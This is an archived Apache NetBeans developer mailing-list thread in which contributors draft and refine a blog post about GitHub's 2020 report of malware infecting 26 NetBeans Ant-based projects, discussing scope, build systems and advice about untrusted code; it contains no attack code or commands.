>> If making any comment at all, I would rewrite.
> 
> The most important thing is to get something out there and strike while
> the iron's hot. This "story" has even hit Slashdot:
> 
> https://news.slashdot.org/story/20/05/30/2031219/github-warns-java-developers-of-new-malware-poisoning-netbeans-projects
> 
> -- 
> Glenn Holmer (Linux registered user #16682)
> "After the vintage season came the aftermath -- and Cenbe."
> 
> 
> ---------------------------------------------------------------------
> To unsubscribe, e-mail: dev-unsubscribe@netbeans.apache.org
> For additional commands, e-mail: dev-help@netbeans.apache.org
> 
> For further information about the NetBeans mailing lists, visit:
> https://cwiki.apache.org/confluence/display/NETBEANS/Mailing+lists

Re: Proposed blog on malware report

[Glenn Holmer <ce...@kolabnow.com.INVALID>]

On 5/31/20 3:39 PM, Erik Costlow wrote:
> If making any comment at all, I would rewrite.

The most important thing is to get something out there and strike while
the iron's hot. This "story" has even hit Slashdot:

https://news.slashdot.org/story/20/05/30/2031219/github-warns-java-developers-of-new-malware-poisoning-netbeans-projects

-- 
Glenn Holmer (Linux registered user #16682)
"After the vintage season came the aftermath -- and Cenbe."

Re: Proposed blog on malware report

[Jesse Glick <ty...@gmail.com>]

Just a couple minor remarks here:

On Sun, May 31, 2020 at 4:39 PM Erik Costlow <er...@outlook.com> wrote:
> This does not impact users of other build systems […] or even most ant users.

Specifically, if you use either freeform or autoproject you can use
Ant as the build tool for your NetBeans project without the specific
project layout targeted by this attack.

> The majority of NetBeans projects leverage native build tool integrations that is shared with continuous integration systems.

The managed Ant-based project types (such as in the `java.j2seproject`
module) _can_ be shared with CI systems. In fact this was a key design
goal at the time, when Java developers would typically do local builds
using proprietary IDE tooling, and then write something else for CI
(if they were doing CI at all) and try to keep the two sets of
configurations in synch.

---------------------------------------------------------------------
To unsubscribe, e-mail: dev-unsubscribe@netbeans.apache.org
For additional commands, e-mail: dev-help@netbeans.apache.org

For further information about the NetBeans mailing lists, visit:
https://cwiki.apache.org/confluence/display/NETBEANS/Mailing+lists

Re: Proposed blog on malware report

[Erik Costlow <er...@outlook.com>]

If making any comment at all, I would rewrite. If there were a vulnerability or the attack was large, I'm sure the GitHub team would have gotten in touch. The key themes are:

  1.  The attack was small, isolated, and is over
  2.  Most builds do not leverage anything netbeans-specific, such as this ant build (I guessed at 2006)
  3.  Software supply chain risk is legitimate and if action were needed or is needed in the future, something would happen

Researchers at GitHub have identified 26 projects on GitHub that have been infected by malware. The initial point of infection is undetermined and all activity with the malware has been shut down. The malware relied on projects created using an older customized ant-based build system that has been in limited use since 2006. This does not impact users of other build systems like Maven or Gradle, or even most ant users. The majority of NetBeans projects leverage native build tool integrations that is shared with continuous integration systems.
With over 44 million repositories hosted on GitHub[2], the scope of these 26 projects looks isolated and does not significantly impact the NetBeans community.
Software Supply Chain attacks are not unique to any IDE and the NetBeans contributor team will monitor the threat landscape to keep developers safe and aware.

[1] https://securitylab.github.com/research/octopus-scanner-malware-open-source-supply-chain
[2] https://www.zdnet.com/article/github-tops-40-million-developers-as-python-data-science-machine-learning-popularity-surges/


"Researchers at GitHub have identified 26 projects on GitHub that have been
infected by malware. The malware infiltrates the project structure of
Ant-based applications in the format generated specifically by NetBeans.
The owners of the 26 projects, which are mostly small Java applications,
have been contacted and the infected projects have been set to private on
GitHub. The malware campaign is no longer active, GitHub did not consider
it relevant enough to be in touch with the NetBeans community about it, and
there is no evidence that applications beyond the 26 in question have been
impacted. Be aware that any project structure that you use when developing
applications can be infiltrated by malware and make sure that the files you
check into your versioning system are your own or that you know where they
come from and what they do."


________________________________
From: Neil C Smith <ne...@apache.org>
Sent: Sunday, May 31, 2020 1:51 PM
To: dev <de...@netbeans.apache.org>
Subject: Re: Proposed blog on malware report

On Sun, 31 May 2020, 18:08 Geertjan Wielenga, <ge...@apache.org> wrote:

> Be aware that any project structure that you use when developing
> applications can be infiltrated by malware and make sure that the files you
> check into your versioning system are your own or that you know where they
> come from and what they do."
>
>
> Feedback welcome and needed.
>

Looks good to me, but I'd be tempted to emphasise "when developing
applications, with any IDE or build system, ..." And also that you should
treat building untrusted code the same way you'd treat running untrusted
binaries, ie. carefully.

Interesting that the GitHub article doesn't mention that this applies to
projects that were originally structured with Ant in NetBeans. You wouldn't
have to still be building in the IDE to be exploited here?

Best wishes,

Neil

>

Re: Proposed blog on malware report

[Neil C Smith <ne...@apache.org>]

On Sun, 31 May 2020, 18:08 Geertjan Wielenga, <ge...@apache.org> wrote:

> Be aware that any project structure that you use when developing
> applications can be infiltrated by malware and make sure that the files you
> check into your versioning system are your own or that you know where they
> come from and what they do."
>
>
> Feedback welcome and needed.
>

Looks good to me, but I'd be tempted to emphasise "when developing
applications, with any IDE or build system, ..." And also that you should
treat building untrusted code the same way you'd treat running untrusted
binaries, ie. carefully.

Interesting that the GitHub article doesn't mention that this applies to
projects that were originally structured with Ant in NetBeans. You wouldn't
have to still be building in the IDE to be exploited here?

Best wishes,

Neil

>

Re: Proposed blog on malware report

[Geertjan Wielenga <ge...@apache.org>]

Yes, agree with that — I think we should take Eric’s rewrite of my
proposal, link to the report and also link to Jaroslav’s blog entry.

Gj

On Mon, 1 Jun 2020 at 10:33, Neil C Smith <ne...@apache.org> wrote:

> On Mon, 1 Jun 2020 at 08:30, Jaroslav Tulach <ja...@gmail.com>
> wrote:
> > My personal take on the malware situation is available at
> > http://wiki.apidesign.org/wiki/Malware
>
> You have a talent for better saying what I'm thinking! :-)
>
> I don't know whether we or you would be happy with reblogging that
> from here, or whether that's entirely appropriate?  But the points
> raised in the "Don't blame the editor" and "Vulnerable build systems"
> sections, as well as the reasons behind defaulting to Maven projects,
> have to be in any post on this from NetBeans side IMO.
>
> Best wishes,
>
> Neil
>
> ---------------------------------------------------------------------
> To unsubscribe, e-mail: dev-unsubscribe@netbeans.apache.org
> For additional commands, e-mail: dev-help@netbeans.apache.org
>
> For further information about the NetBeans mailing lists, visit:
> https://cwiki.apache.org/confluence/display/NETBEANS/Mailing+lists
>
>
>
>

Re: Proposed blog on malware report

[Jaroslav Tulach <ja...@gmail.com>]

Feel free to copy my text ideas, make it less personal and republish where
appropriate.
-jt


po 1. 6. 2020 v 10:33 odesílatel Neil C Smith <ne...@apache.org>
napsal:

> On Mon, 1 Jun 2020 at 08:30, Jaroslav Tulach <ja...@gmail.com>
> wrote:
> > My personal take on the malware situation is available at
> > http://wiki.apidesign.org/wiki/Malware
>
> You have a talent for better saying what I'm thinking! :-)
>
> I don't know whether we or you would be happy with reblogging that
> from here, or whether that's entirely appropriate?  But the points
> raised in the "Don't blame the editor" and "Vulnerable build systems"
> sections, as well as the reasons behind defaulting to Maven projects,
> have to be in any post on this from NetBeans side IMO.
>
> Best wishes,
>
> Neil
>
> ---------------------------------------------------------------------
> To unsubscribe, e-mail: dev-unsubscribe@netbeans.apache.org
> For additional commands, e-mail: dev-help@netbeans.apache.org
>
> For further information about the NetBeans mailing lists, visit:
> https://cwiki.apache.org/confluence/display/NETBEANS/Mailing+lists
>
>
>
>

Re: Proposed blog on malware report

[Neil C Smith <ne...@apache.org>]

On Mon, 1 Jun 2020 at 08:30, Jaroslav Tulach <ja...@gmail.com> wrote:
> My personal take on the malware situation is available at
> http://wiki.apidesign.org/wiki/Malware

You have a talent for better saying what I'm thinking! :-)

I don't know whether we or you would be happy with reblogging that
from here, or whether that's entirely appropriate?  But the points
raised in the "Don't blame the editor" and "Vulnerable build systems"
sections, as well as the reasons behind defaulting to Maven projects,
have to be in any post on this from NetBeans side IMO.

Best wishes,

Neil

---------------------------------------------------------------------
To unsubscribe, e-mail: dev-unsubscribe@netbeans.apache.org
For additional commands, e-mail: dev-help@netbeans.apache.org

For further information about the NetBeans mailing lists, visit:
https://cwiki.apache.org/confluence/display/NETBEANS/Mailing+lists

Re: Proposed blog on malware report

[Jaroslav Tulach <ja...@gmail.com>]

My personal take on the malware situation is available at
http://wiki.apidesign.org/wiki/Malware
-jt


ne 31. 5. 2020 v 19:08 odesílatel Geertjan Wielenga <ge...@apache.org>
napsal:

> Hi all,
>
> I propose we publish the following on the Apache NetBeans blog re the
> recent announcement by GitHub researchers of malware found in some NetBeans
> generated projects on GitHub.
>
> Title: Malware Found in 26 NetBeans Ant Projects on GitHub
>
> Content:
>
> "Researchers at GitHub have identified 26 projects on GitHub that have been
> infected by malware. The malware infiltrates the project structure of
> Ant-based applications in the format generated specifically by NetBeans.
> The owners of the 26 projects, which are mostly small Java applications,
> have been contacted and the infected projects have been set to private on
> GitHub. The malware campaign is no longer active, GitHub did not consider
> it relevant enough to be in touch with the NetBeans community about it, and
> there is no evidence that applications beyond the 26 in question have been
> impacted. Be aware that any project structure that you use when developing
> applications can be infiltrated by malware and make sure that the files you
> check into your versioning system are your own or that you know where they
> come from and what they do."
>
>
> Feedback welcome and needed.
>
> Gj
>